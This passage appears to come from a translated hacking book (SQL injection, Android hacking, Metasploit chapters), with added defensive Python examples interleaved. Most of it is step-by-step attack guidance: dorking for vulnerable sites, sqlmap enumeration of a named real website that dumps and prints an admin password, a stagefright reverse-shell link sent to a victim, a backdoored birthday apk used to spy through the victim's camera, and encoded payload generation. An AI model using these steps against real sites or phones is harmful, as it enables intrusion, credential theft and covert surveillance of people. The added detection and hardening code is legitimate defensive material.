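    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


# Constructed sample query strings.
SAMPLES = [
    "id=2",
    "title=border+by+the+sea",
    "id=2%20OR%201=1",
    "id=2%09ORDER%0D%0ABY%0913--",
    "id=2%2520OR%25201%3D1",
    "id=2/**/UNION/**/SELECT/**/1,2",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:40} naive={naive_detect(sample)!s:5} normalized={detect(sample)}")
```

Signature matching of this kind is a detection aid only; it does not replace fixing the query construction in the application.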
SQL Injection Methodology
To carry out a SQL injection there is a pattern that the attacker follows. This can be called the methodology.

First of all, before the SQL injection begins, the attacker has to gather the information that is needed and find out whether any SQL vulnerabilities exist. Once a vulnerability is known to exist, the attack can begin. If authentication is weak, it can be used as the main source of entry into the network.

As the next step, the authentication rules are exploited so that malicious code can be injected. Once that stage is complete, data is extracted in order to obtain network access as a privileged user. Beyond this, privileged access is escalated further to gain more control over the operating system.

Once that has been achieved, privileged user accounts and other new accounts can be created, and existing accounts can be modified or deleted. Trojans or malware can even be installed.

When looking for SQL vulnerabilities, the input fields, hidden fields and POST requests on the website can be listed first. Then code can be injected into an input field in order to provoke an error. Attacks such as error-based SQL injection, union-based SQL injection and blind SQL injection are carried out at this point. If they succeed, an attempt can be made to extract table names, column names and table data from the target database.

With this much theory you are probably getting bored, so let's put it together with some practice.

Finding Vulnerable Websites


First of all, let's simply search for websites that have a SQL vulnerability. As I explained earlier, SQL injection arises from some flaw on the developer's part. There are many SQL vulnerable keywords. I will start with the best known of them, the pattern .php?id= any number.

In the figure above you can see .php?id= being searched for in Google Search. The result is more than 14,000 lakh hits (over 1.4 billion). The vulnerability is to be found among them.

In the figure above I have searched for the vulnerability on one particular target website. The inurl: operator was covered under Advanced Google Search, so you probably know it already. Because inurl:bible-history.com is written, the search is aimed at bible-history.com, the website I want to search. It selects the pages within bible-history.com that contain .php?id=. The difference from the first figure is that the results are narrower because a target has been specified. You can see that only 1420 came back. Because they all belong to a single website, this is more effective for us.

This is the pattern of the vulnerability. "Any number" means that the number at the end can be anything at all. Now let's look into the results.

Let's take the first result as an example. The URL is www.bible-history.com/subcat.php?id=2. With .php?id=2, it matches the .php?id= any number format. In the browser's search results the URL is shown in green. Click that link to open it.

The figure does not show the whole web browser, but you can see the URL and the website.

As in the figure, add ' (an apostrophe) to the end of the vulnerable URL and press Enter.

You will see what is shown in the figure above. Only text is displayed. It reads: Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1. When that happens, you can take it that this vulnerability can be attacked. Likewise, if nothing appears as a result and you see only a white blank area, note that this too can be used for an attack. If some of the website's own content appears, you should take it that the routes for attacking in this way have already been protected.
In the example above, the vulnerable keyword I used was .php?id=. Is that the only one? No. There is a collection of such keywords. It is called Google Dork. You can go and look at it at bit.ly/7000gglist. Type bit.ly/7000gglist into your browser and press Enter.

There you will find a large number of vulnerable keywords. The list can also be downloaded.

One thing I want to point out is that once SQL vulnerabilities have been repaired and removed, the situation may be different. So let me say in advance that the website I am using for this demonstration may not behave the same way when readers try to follow along. Take the methods shown here as methods only, and just note how it is done. Once the website owners have fixed the vulnerabilities I am testing, this vulnerability will no longer be usable. You will have to move on and find another site :)
Now let's discuss the manual steps that follow, using the vulnerable website found just now with .php?id=. We will continue with the part where the columns are found. When we tested earlier by adding an apostrophe to the end of the SQL vulnerable URL, we learned that the vulnerability can be used, so the next thing needed is to find the columns from that URL.

Go back to the original vulnerable URL. (Remove the apostrophe that was added and press Enter again.)

To find the columns we are looking for, append Order by 1-- to the original link. If 1 gives nothing, change it to 2, and keep going until an error appears. In this example the URL is www.bible-history.com/subcat.php?id=2. When Order by 1-- is appended, it becomes www.bible-history.com/subcat.php?id=2 Order by 1--. No error has appeared yet, so put 2 in place of the 1 in the URL and press Enter.

Here it is very easy. At 2, Query failed : appears. (Other sites will not behave in exactly this way.) If you look at the figure above you will see Unknown column '2'. Let's think about that. Unknown column '2' means that column 2 does not exist, or is not known. If there is nothing as far as column 2, then what is below 2 is 1, so there is only column 1. You can remember it like this. (Suppose the site that you, the reader, are examining gives an error at Order by 6--. That has to be taken as meaning column 6 does not exist, so the columns go up to 5. Simply subtract one from the column that gave the error.)
To make this clearer, let's look at one more example.

In the figure above the URL shows .php?id=200, which suggests a vulnerability, and when an apostrophe is added to check whether SQL can be injected, an error appears. That means it can be used.

Order by 1-- is appended to the original URL. No error appears yet. The search continues with 1, 2, 3, 4, ...

Going up one step at a time, Unknown column appears at column 13. Column 13 does not exist, so what it has goes up to column 12. I think that makes it clear.
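An added example (not from the book and not the code of any site it mentions): the developer-side cause of the behaviour described above, reproduced locally in Python with an in-memory SQLite database, next to the corrected form. The table `subcat`, its rows and the function names are assumptions made for illustration; SQLite's error text differs from the MySQL message quoted in the book, but the mechanism is the same.

```python
import sqlite3


def make_db():
    """Constructed two-column table standing in for a page's backing data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE subcat (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO subcat VALUES (?, ?)",
                   [(1, "Maps"), (2, "Timelines")])
    return db


def lookup_vulnerable(db, raw_id):
    """The flaw: the request value is pasted into the SQL text."""
    sql = "SELECT id, title FROM subcat WHERE id = " + raw_id
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # Echoing the database error to the visitor is the second flaw: it
        # confirms the injection point and leaks the column count.
        return ("error", str(exc))


def lookup_hardened(db, raw_id):
    """Validate the type, bind the value, never show database errors."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return ("rejected", [])
    rows = db.execute("SELECT id, title FROM subcat WHERE id = ?",
                      (int(raw_id),)).fetchall()
    return ("rows", rows)


def find_by_title(db, title):
    """Text input cannot be type-checked away, so binding does the work:
    the whole value is compared as data, quotes included."""
    return db.execute("SELECT id, title FROM subcat WHERE title = ?",
                      (title,)).fetchall()


# Constructed request values mirroring the checks described in the text.
PROBES = ["2", "2'", "2 ORDER BY 2--", "2 ORDER BY 3--", "2 OR 1=1"]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(f"{probe!r:18} vulnerable={lookup_vulnerable(db, probe)}")
        print(f"{'':18} hardened  ={lookup_hardened(db, probe)}")
    print(find_by_title(db, "x' OR '1'='1"))
```

With bound parameters the apostrophe and the ORDER BY suffix never reach the SQL parser as syntax, so neither the syntax error nor the column-count error can occur.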

Havij (Windows)
There are tools that we can use for SQL injection. I will start with two tools that run on Windows. The first is Havij. It can be downloaded from bit.ly/havijexe (password havijpro). (As usual, you can also get it from the page where the apps are collected.)

After opening Havij, enter the vulnerable URL of the victim website in the Target field and click Analyze; you will see it analyzing. When the Analyze button appears again, the analysis has finished.

Click Get under Info to carry on. Throughout this chapter I will be demonstrating against bible-history.com only.

When the Get button appears again, as in the figure above, the info has been obtained.

Under Tables, click Get DBs to retrieve the databases. In the figure the databases have already been retrieved. Of these, the first database, bible_history, has been selected. (The others will be gone through one at a time later.) Then click Get Tables to retrieve the tables.

In the figure above you can see the tables contained in the bible_history database. Each one has to be searched in turn; since this is only a demonstration, I will show just one. It is better to try the rest for yourself. It is as in the figure above: select the table called Email in the bible_history database and click column, so that the search continues with the columns.

Going step by step, the columns are found; I select one column and click Get Data.
That is how it is done, step by step. Let's go back over the steps. What we did was: 1. We used search to check whether our target has a SQL vulnerability, and when a vulnerable URL was found we copied it. 2. From that vulnerable URL we found the database. 3. We found the table. 4. We found the column, and from there we retrieved the data. So remember that these are the steps that have to be carried out.

Suppose Database A alone has three tables, and each table has three columns. In that case there are 9 parts (9 kinds) that we have to search. In practice there will be more than this. And this example covers Database A only. B and C may each have around ten tables of their own, and each table may in turn have many columns, so even within a single DB you will find a great many parts to search. The information we want will not be in every place. That is why we need to know how not to give up easily.

Another tool that can be used on Windows is BSQL Hacker. Enter your target website under Target URL, choose Automated Attack and press Start to begin. I will not go into the details here. Let's move on to how it is done in Kali Linux.
SQLmap
Let's work through an example using sqlmap, which comes built into Kali Linux.

Open a Terminal. What I used is sqlmap -u (url) --dbs. sqlmap means that we are going to use SQL map. -u means that the vulnerable URL follows. As the example I show bible-history.com, which I had set as the target. In --dbs, db = Database and s = search (database search). These are the same steps we followed earlier with Havij in the Windows app: find the vulnerable URL, then search for the databases through it.

Searching for databases, we find 5 of them: bible_glossary, bible_history, information_schema, keywords and kidsdict. Now that the database search is done, we continue by searching each of them in turn. Here I will demonstrate with the second of the five databases, bible_history. (In reality you have to search all of them one by one: if searching all of 1 turns up nothing, move on to 2.) I will not show each of them. The idea is the same for all, so I will demonstrate only one.

The first command, sqlmap -u (URL) --dbs, was used to find the databases. Now that the databases are known, we use -D in place of --dbs. After -D I enter the database I am going to use, which is bible_history. Once the database is known, the next thing to find is the tables, so we use --tables to do a table search. The command I used in the picture above is therefore sqlmap -u (URL) -D (Database) --tables.

In the picture above you can see 2 tables in the bible_history database. Each of them has to be searched further in turn. :) It is not very many.

At this step I will use the table named administrators from among the tables. (You have to try each one in turn.) Let's look at the command I used in the picture above. It is:

sqlmap -u (url) -D (database) -T (table name) --columns

Since the database and the table are now known, the column search (--columns) is used. Let's see what comes back. What I searched was the administrators (table) in bible_history (database). You will see that five columns came out.

What I used in the picture above is sqlmap -u (url) -D (database) -T (table name) -C (column name) --dump. Here I used the column named admin_password.

As the result, a piece of info, Mos3s, was obtained from the admin_password (column) in the administrators (table) of bible_history (database).
Looking back at what we have done up to this point: before the database was known we used --dbs to search for databases, but once the databases were known and we were searching inside one of them, we used -D instead of --dbs. The same goes for the table search (--tables) and the column search (--columns): we switched to -T and -C (capital letters). Because it goes one step at a time, it is easy to remember. In reality, SQL injection techniques are very broad and there is a great deal to discuss.
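The staged enumeration summarised above (databases, then tables, then columns, then data) leaves the same staged trail in the target's web server log, and that trail is what a defender can look for. The Python below is an added example, not code from the book: it classifies requests in constructed access-log lines by stage. The log lines, addresses, the `app_db`/`accounts` names and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (combined log format), not real traffic.
# Paths, addresses and the app_db/accounts names are made up.
TOOL_UA = '"sqlmap/1.1.3#stable (http://sqlmap.org)"'
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [12/Mar/2017:10:00:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2017:10:00:09 +0000] "GET /search.php?q=union+station+tickets HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2017:10:02:11 +0000] "GET /item.php?id=5%27%20AND%201%3D1--%20- HTTP/1.1" 200 5120 "-" ' + TOOL_UA,
    '198.51.100.9 - - [12/Mar/2017:10:02:15 +0000] "GET /item.php?id=-5%20UNION%20ALL%20SELECT%20schema_name%20FROM%20information_schema.schemata--%20- HTTP/1.1" 200 640 "-" ' + TOOL_UA,
    '198.51.100.9 - - [12/Mar/2017:10:02:19 +0000] "GET /item.php?id=-5%20UNION%20ALL%20SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema%3D%27app_db%27--%20- HTTP/1.1" 200 655 "-" ' + TOOL_UA,
    '198.51.100.9 - - [12/Mar/2017:10:02:24 +0000] "GET /item.php?id=-5%20UNION%20ALL%20SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27accounts%27--%20- HTTP/1.1" 200 671 "-" ' + TOOL_UA,
    '198.51.100.9 - - [12/Mar/2017:10:02:30 +0000] "GET /item.php?id=-5%20UNION%20ALL%20SELECT%2F**%2Fpass_hash%20FROM%20app_db.accounts--%20- HTTP/1.1" 200 702 "-" ' + TOOL_UA,
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Ordered rules: the first match wins. The stage names follow the page's
# workflow (--dbs, --tables, --columns, --dump).
RULES = [
    ("databases", re.compile(r"information_schema\.schemata")),
    ("tables", re.compile(r"information_schema\.tables")),
    ("columns", re.compile(r"information_schema\.columns")),
    ("dump", re.compile(r"union\s+(?:all\s+)?select\b.*?\bfrom\s+(?!information_schema)\w")),
    ("probe", re.compile(r"['\"]\s*(?:and|or)\s+\d+\s*=\s*\d+|\border\s+by\s+\d+")),
]


def classify(decoded_query):
    """Return the enumeration stage a decoded, lower-cased query string shows."""
    for stage, pattern in RULES:
        if pattern.search(decoded_query):
            return stage
    return None


def analyse(log_text):
    """Map each suspicious source IP to the stages it reached, in order seen."""
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        query = unquote_plus(urlsplit(m.group("target")).query).lower()
        query = re.sub(r"/\*.*?\*/", " ", query)   # inline SQL comments used as spaces
        query = re.sub(r"\s+", " ", query)
        stage = classify(query)
        tool_ua = "sqlmap" in m.group("ua").lower()
        if stage is None and not tool_ua:
            continue
        rec = findings.setdefault(
            m.group("ip"), {"stages": [], "tool_ua": False, "requests": 0})
        rec["requests"] += 1
        rec["tool_ua"] = rec["tool_ua"] or tool_ua
        if stage and stage not in rec["stages"]:
            rec["stages"].append(stage)
    return findings


def reached_data(findings):
    """Sources that got past schema enumeration and read table contents."""
    return sorted(ip for ip, rec in findings.items() if "dump" in rec["stages"])


if __name__ == "__main__":
    for ip, rec in analyse(SAMPLE_LOG).items():
        print(ip, rec)
```

The User-Agent check only catches a tool left at its default; the stage patterns still fire when the header is changed, and the fix for the underlying flaw remains parameterised queries in the application.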
On this subject I will be writing a further book titled Web Basic & SQL Injection. It will run to more than 600 pages. Writing it will take quite a long time, so it may be a while. I will also be posting other things worth knowing in the Facebook Secret Group. Allow me to stop this chapter here. Let's meet again in another chapter.
CHAPTER 23: Mobile Hacking

Introduction

This is a topic everyone understands just from the title, so it needs no special introduction. Today, one thing almost all of us are in contact with every single day is the mobile phone. Not everyone has a computer, but nearly everyone has a phone, and from that you can estimate how many mobile phone users there are.

As the number of mobile phone users grows, the security of mobile phones has become a challenge. As far back as 2014 we learned, to our surprise, that there were more mobile phones than people in the world. Today, in 2017, that hardly needs saying.

What draws even more attention is that paid applications from the Apple store, paid applications from the Google Play Store, and games that are free but charge money for needed items or for levelling up faster can all be bought from the phone. On top of that, because people use advertising services such as Ads on social media like Facebook, financial details also have to be entered on the phone.

Because of all this, attackers have turned their attention to mobile phones. They try every way they can to get the data on phones, and malicious hackers have devised many methods to collect Mobile Banking, iBanking and other financial information used on the phone. They set up websites such as 18+ sites that can be viewed for free and try to obtain information through the browser. They create large numbers of applications and try to get information from mobile phone users. For these reasons, mobile phone users should take care to keep their phones secure.

Areas to Consider
Mobile phones keep advancing steadily, in step with how attached we are to them. Let's think about the things on our phones that can put us at risk.

The first point to consider is the security of the mobile phone itself. Things that can affect its security include the phone being lost, the phone being stolen, being connected to some wireless access point, and charging over a USB cable.

The next point to consider is application security. We also have to take into account the worrying aspects of the applications installed on our mobile phones. From studying Threat Reports we can learn that some applications steal user information from us. Such applications mostly come from unauthorized application stores, but they are sometimes found even in an application store that is considered trustworthy, such as the Google Play Store.

In addition, because wireless technologies such as wifi and bluetooth are built into phones, wireless security has to be included among the things to watch. Another point is the permissions of the applications we use. Be careful when granting permissions to applications that are not trustworthy. It is acceptable for applications such as Facebook, Messenger and Viber to ask for permission to the Camera or the Gallery, but if an ordinary application that claims to clean up your phone is asking for access to the camera, audio, gallery and so on, that is something to think about. Let's try a little Android hacking in practice.

Hacking Android Using Metasploit


First, type msfconsole in the Kali Linux Terminal. This is short for Metasploit Framework Console. Detailed explanations will be given in the Metasploit Basic chapter. As shown above, you will arrive at msf>.

As shown above, I used stagefright from among the android exploits.

As shown above, you can see that we are now inside stagefright. You can display show options.

In the picture you can see that SRVHOST is all zeros. Let's put our IP address there.

As shown above, SRVHOST is set to our IP address. Press Enter.

As shown above, set URIPATH to / (root system).

On the next line, set PAYLOAD has to be specified. Here I set linux/armle/meterpreter/reverse_tcp as the payload.

Looking again, you will see it as in the picture above. Call show options once more.

As shown above, you can see that a Payload Options section has been added. The current column for LHOST is blank. It has to be filled in with our IP.

As shown above, the IP address is filled in with set LHOST.

I set Verbose to true. If we look at show options again now, LHOST is shown with the IP address. I started the exploit with exploit -j. Looking at the picture above, the URL : http://192.168.43.150:8080/ has to be sent to our target. As soon as the target clicks that link (just clicking is enough), you will see the following.

I tested with a target running Android 7.0. In the picture above you can see the target's Android version. You can also see that the mobile browser currently in use on the target is Xiaomi's MIUI browser. (The following steps were tested with a different phone.)

Once an active session with the target device has been established, you will see meterpreter session (1) opened. My IP address is 192.168.43.150. The address of the target mobile the link was sent to is 192.168.43.2. From this we can tell that we are on the same network. If you want to use this attack not only on the same network but over the WAN (whether or not the networks are the same), you need to know how to do Port Forwarding. Once an active session has been established, you can display it with the sessions -l command.

In the picture above, listing the sessions showed only one ID, 1. So I selected the session id with sessions -i 1.

After that, as in the picture above, you can use sysinfo to view the victim's system information. The procedure above can connect directly only to Android devices with weak security; with more secure Android devices it may not work. If you run into that situation, change 8080 in the link to 4444.

If you are inside meterpreter and do not know how to poke around, type help to see the commands and their descriptions.

Inside msf you can search for the Android-related payloads as shown above.

If you want to search only for meterpreter payloads, you can search as shown above. If you want only the shell ones, search with shell in place of meterpreter. The Metasploit Framework itself will be discussed further only when we reach the Metasploit Framework chapter. Looking at the metasploit payloads, you will see that there are quite a few for Android as well.

The Fat Rat installation on Kali Linux

Use the command above to get TheFatRat. TheFatRat is a program that is very useful for hacking and includes tools that help a great deal with Android hacking.

When it reaches 100%, the clone of TheFatRat is complete.

Go on into the the fat rat folder with cd TheFatRat.

If you list the contents with ls, you will see a file named setup.sh. Because it is a .sh file, you know it has to be run with ./

If you run it just like that, you will only see Permission denied, as shown above. The program file we are going to use needs the executable permission (x) added. (I am repeating this so that you know it when you have to install things on your own later.) Now setup.sh can be run. During installation, small XTerm (terminal window) windows will pop up one after another. Do not close them. You have to wait until it reaches 100%. An internet connection is also required. When it asks y/n about creating a shortcut, answer y. After that, wherever you are in the Terminal, typing fatrat will bring it up.

When you type fatrat, you will see the main menu as shown above. In the picture you can see that there are 16 main menu options.

Because I am going to put a backdoor into an apk file, I chose 5.

As shown above, you come to the place where it asks for the LHOST IP. Since it shows the IPV4 address, you can see your own address. But as we know, that only works on the same network. We want to use it more widely than that; in other words, we want it to work on people using other networks as well. So it is necessary to do a Port Forward and enter that. There is a separate Port Forwarding chapter. I will enter the tcp forwarding address that I forwarded with tcp port 1234. Readers who want to try this before reaching the Port Forwarding chapter can skip ahead for a moment.

I have now entered LHOST and LPORT.

The next step is to choose the File Path (the file location together with the full file name). I have an Android application file named Happy_Birthday.apk on my Desktop, so I used that. Do not make mistakes when typing file names. Readers can use games that their victim will like, or other applications. Note that you can temporarily rename the file to a name without spaces so that it is easier to use. Do not change the .apk at the end. For example, Facebook.apk and so on. Then give the file path as in the picture above.

Suppose you have a file abc.apk in your Downloads folder. To use it, you would give the file path as /root/Downloads/abc.apk. When typing the path, the file names must be entirely correct, including upper and lower case.

The next step is to choose the payload. In the picture you can see 6 payloads.

Since I have forwarded tcp port 1234, I will use android/meterpreter/reverse_tcp. It is option 3, so I chose 3 as shown above.

The next step asks you to choose the tool for creating the apk. Rather than the ready-made Backdoor-apk, I chose the old Fatrat method. That is 2.

When that is done, it will ask whether to create a listener, as shown above. Enter y.

Now we are at the step where it asks for the output file name. Give any name you like, without spaces. I named it Birthday. (There is no need to add .apk.) Just as this file is named Birthday, the apk I used was Happy_Birthday.apk, so it only remains to get it to my target one way or another as a birthday present. The picture above shows where the listener file for our apk is located. Pressing enter once more returns you to the Fatrat main menu.

The file we created will always be found in the Home/TheFatRat/backdoored folders under the name app_backdoored.apk. You can now rename it there to whatever you like. Do not leave it under this name at all. I named it Happy Birthday.apk. I renamed it with Right click >> rename, and spaces are allowed now. Do not remove the .apk.

In the Fatrat main menu I chose option 9 and went on into msf.

At msf > I used use multi/handler. You will remember that when choosing the payload earlier we chose android/meterpreter/reverse_tcp. set payload has to be done to match that, as in the picture above.

This sets LHOST and LPORT. (I already said at the start that I had forwarded tcp port 1234.)

Everything is ready, so exploit can now be started.

The victim has installed the apk and a meterpreter session has been obtained, so you can now poke around. Type ? and press enter to look through the commands that can be used.

A few sample commands: check_root checks whether the device is rooted, and webcam_snap uses the camera to take a picture of the victim. The person appears in the picture only if they are facing the phone. It tells you where the picture is saved and under what name, so I hope you can find and open it.
The main purpose of this lesson is for you to learn not to download and install apk files carelessly, and not to do things like opening Zapya and asking for an app to be sent over from people who are not trustworthy. Having your own personal information leaked is bad, and committing this kind of act against other people is also a crime under Cyber Law.
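Both the permission advice earlier in this chapter and the lesson just stated can be checked mechanically before an apk is installed. The Python below is an added example, not code from the book: it reads the `uses-permission` entries of a manifest that has already been decoded to text XML (for instance with apktool), flags sensitive permissions that do not fit the app's stated purpose, and lists permissions that are absent from a known-good copy of the same app. The manifests, package names, app categories and the `EXPECTED` policy are constructed assumptions; the permission names are real Android ones.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Permissions that expose personal data or sensors.
SENSITIVE = {P + n for n in (
    "CAMERA", "RECORD_AUDIO", "READ_SMS", "SEND_SMS", "READ_CONTACTS",
    "READ_CALL_LOG", "ACCESS_FINE_LOCATION", "READ_EXTERNAL_STORAGE",
)}

# Hypothetical policy: sensitive permissions each kind of app plausibly needs.
EXPECTED = {
    "messenger": {P + "CAMERA", P + "RECORD_AUDIO", P + "READ_CONTACTS",
                  P + "READ_EXTERNAL_STORAGE"},
    "cleaner": {P + "READ_EXTERNAL_STORAGE"},
    "greeting_card": set(),
}


def build_manifest(package, names):
    """Build a constructed, already-decoded AndroidManifest.xml for the demo."""
    perms = "".join(
        '<uses-permission android:name="%s%s"/>' % (P, n) for n in names)
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            'package="%s">%s<application/></manifest>' % (package, perms))


# Constructed samples: a cleaner app, and one card app in two copies.
CLEANER = build_manifest("com.example.cleaner", [
    "KILL_BACKGROUND_PROCESSES", "READ_EXTERNAL_STORAGE", "CAMERA", "RECORD_AUDIO"])
ORIGINAL_CARD = build_manifest("com.example.card", ["INTERNET"])
REPACKAGED_CARD = build_manifest("com.example.card", [
    "INTERNET", "CAMERA", "RECORD_AUDIO", "READ_SMS", "READ_CONTACTS",
    "ACCESS_FINE_LOCATION", "RECEIVE_BOOT_COMPLETED"])


def requested_permissions(manifest_xml):
    """Return the set of permission names a decoded manifest requests."""
    root = ET.fromstring(manifest_xml)
    names = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    return names - {None}


def review(manifest_xml, category, baseline_xml=None):
    """Flag sensitive permissions outside the category's policy and, when a
    known-good manifest is supplied, every permission added since then."""
    requested = requested_permissions(manifest_xml)
    unexpected = sorted((requested & SENSITIVE) - EXPECTED[category])
    added = []
    if baseline_xml is not None:
        added = sorted(requested - requested_permissions(baseline_xml))
    return {"unexpected_sensitive": unexpected, "added_since_baseline": added}


if __name__ == "__main__":
    print(review(CLEANER, "cleaner"))
    print(review(REPACKAGED_CARD, "greeting_card", ORIGINAL_CARD))
```

A permission diff is only a first signal; comparing the apk's signing certificate with the one on the store copy is the stronger check, because a repackaged file cannot carry the original developer's signature.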
Allow me to conclude this chapter here. Let's continue the discussion in another chapter.
CHAPTER 24: Metasploit

Introduction

I expect everyone who is studying hacking has already heard of Metasploit. The Metasploit Project is a computer security project that provides information about security vulnerabilities. It was produced for penetration testing, but because its hacking (attacking) tools can be put to use, malicious users have come to use it too.

There are two kinds, Metasploit Pro and Metasploit Framework. Pro has to be bought, and it can also be tried as a free trial. But since we are only just starting out with Metasploit, there is no need to buy Pro yet. The Metasploit Framework that comes built into Kali Linux can be used directly.

Being open source, being usable together with the results of powerful scanners such as Nessus & Nexpose, and including a large number of payloads are the things that give Metasploit so many users. In Kali Linux, Metasploit is already included, so it can be started just by typing msfconsole in the Terminal.

Working with Scanners


When you see msf >, you are inside the Metasploit Framework Console. For Metasploit plugins to work smoothly, service postgresql start needs to be run before calling msfconsole. This is because Metasploit uses PostgreSQL as its database. (So it is better to run service postgresql start first and only then call msfconsole.)

As an example, the Metasploit plugin wmap is loaded here. It can only be loaded once you are at msf>. After loading plugins, you can use help, as shown above, to study the commands and their descriptions.

A site is created with wmap_sites -a http://IP_Address.

You can display the available sites with site list.

Using wmap_targets, the 192.168.43.150 shown in the picture above is entered and set as the target.

To view the list of targets that have been set, use wmap_targets -l. (You will see only the targets we have entered.)

If you want to list the modules that will scan our target (remote system), you can use -t. With -e the scan with WMAP can be started. I will not show the full screenshots. You will understand it better by trying it out inside your own network.

The vulnerabilities obtained from the scan can be listed. For that, use wmap_vulns -l. Looking at what I have just used, you will see wmap_sites, wmap_targets, wmap_run and wmap_vulns. If you want to know the options that follow each of them, you can look them up with -h. For example: wmap_sites -h, wmap_run -h, etc.

In addition, the output result xml file of a scan done with the scanning tool Nexpose can also be used as input in msf. In the example above, the file report.xml located in system > root > Nexpost is imported using the db_import command.

In the same way, files from a Nessus scan whose output was saved as .nbe can also be imported and used with db_import.

The vulns for each of the service ports found in the picture above can also be searched in the form vulns -p (port number), as in the picture above.

They can also be searched in the form vulns (IP) -p (port).

Suppose that when searching, CVE-2010-2075 is found, as shown above.

As shown above, when exploits are searched by CVE number using search cve:, a Backdoor Command Execution is found, as seen in the picture.

In that case, we can now use the exploit that was found.

Run exploit.

As shown above, a session has opened, so terminal commands can now be used to poke around.

Metasploit Fundamentals
MSF Console
msfconsole is the most popular interface of the Metasploit Framework. Besides being arranged so that all the features in MSF can be used together from one place, it is also the most stable interface of MSF. Commands such as ping can also be used inside msf.

If you do not want a lot of text to appear as it usually does, you can also add -q and use it in quiet mode.

If there are commands you do not know or cannot remember, you can look them up again with help.

Also, when you know how a payload name begins but have forgotten the rest, you can keep pressing the Tab key to see and choose from the matching ones.

Active exploits exploit the relevant hosts and run until they are finished. If you want one to run in the background, add -j.

The example above shows an active exploit. After active, as usual, comes passive. A passive exploit waits for incoming hosts and exploits them when they connect.

To list the shells that can be enumerated, use sessions -l, and to select a session, use the form sessions -i (ID).

In the example above, no exploitation happens until the victim reaches the attacker's malicious website.
Payloads
In Metasploit, payload refers to exploit modules. There are three kinds of payload module in metasploit: singles, stagers and stages. In terms of payload types, an Inline (Non Staged) payload contains the full shell code and exploit needed to carry out its assigned task. Because inline payloads are all in one, they are more stable than their counterparts. Stager payloads are the ones that work together with stage payloads in order to carry out the assigned functions. They set up a communication channel between the attacker and the victim and can read in the stage payload to be executed on the remote host.

Meterpreter is short for Meta-Interpreter and is a multi-faceted payload that operates via dll injection. Meterpreter resides in the memory of the remote host and can leave without any trace remaining on the hard drive. This makes it difficult to detect with CFT (Conventional Forensic Techniques), and scripts & plugins can be swapped in and out as needed. PassiveX can help in getting around the restrictions of outbound firewalls. It uses an ActiveX control so that it can operate hidden, and it communicates with the attacker by way of HTTP requests & responses.

NX stands for No eXecute. It is a feature built into CPUs to protect against code being executed in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). Metasploit has payloads created to get around this DEP. They are called NoNX.

Next is Ord. This refers to ordinal payloads, which are Windows stager based payloads with distinct advantages and disadvantages. The advantages are that they work on systems as old as Windows 9x and that they are extremely small in size. However, because of some disadvantages they are not the default choice. The first is that they depend on ws2_32.dll already being loaded in the process to be exploited before exploitation; the second is that they are weaker in stability than the other stagers.

If you want to operate on IPv6 networks, you can use the Metasploit IPv6 payloads. The last one is Reflective DLL injection. It can be thought of as a technique in which stage payloads are injected into processes running in memory without touching the host's hard drive. This has been only a brief description of the types of payloads.

Generating a Payload for Metasploit


We already know that Metasploit payloads can be produced right inside msfconsole. When certain payloads are used, Metasploit adds the "generate", "pry" and "reload" commands. Let's look at an example.

The commands used have already been discussed, so I will not explain them again.

In msf, the shell_bind_tcp payload from among the windows payloads is used as the example. If you want to know which commands can be used next, type help as usual. From that payload I chose the generate option. If you do not know what to do, you can add -h after it to call up help.

I ran generate without adding any options. Looking at the picture above, you will see that it contains the bad character known as the null byte (\x00). Some exploits do allow this to be used (that is, it works), but not many. At the same time as generating the shell code, Metasploit itself can also be used to remove the unwanted bytes.

In this picture the \x00 bytes are no longer to be seen. The unwanted bytes were removed with -b. It is clear if you compare the two pictures carefully. The null bytes have been removed successfully, and in this way a payload free of null bytes has been built. Another thing that stands out is that in the first picture it is only 328 bytes, while in the second picture, with the bytes removed, it has become 355 bytes. The difference is 27 bytes. (This is on the second line of the pictures.)

This shows a large number of bytes being excluded. By now I think you understand how to remove null bytes and other unwanted bytes. The ability to generate shell code without using certain characters is one of the strengths of the metasploit framework. But this ability is not without limits. Look at the following picture.

When the unwanted bytes become too many, metasploit shows the message Payload generation failed: No encoders encoded the buffer successfully. as in the picture above.

When payloads are created, the best encoder is normally chosen. Metasploit makes the choice automatically. However, there are times when you need to use a particular one regardless of what metasploit considers best. Imagine a situation in which the exploit only works with characters other than alphanumeric ones, that is, other than letters and digits. In that kind of situation an encoder like shikata_ga_nai would not be suitable. If you look at the encoder list, you will find that there is an x86/nonalpha encoder.

With show encoders you can read through the encoders, their ranks and their descriptions. I have found the encoder named x86/nonalpha.

Since an encoder is going to be used, -e was given as the option. Now let's put all of these points together and try it:

1. Remove the null byte with -b.
2. Choose the encoder with -e.
3. Write the output to a file with -f.

Let's combine these three and try it.

What I used in this picture is generate -b '\x00'; these parts have already been explained. For -e, x86/shikata_ga_nai is used as the encoder. With -f it was saved on the Desktop as filename.txt. You can put whatever you like in place of filename.

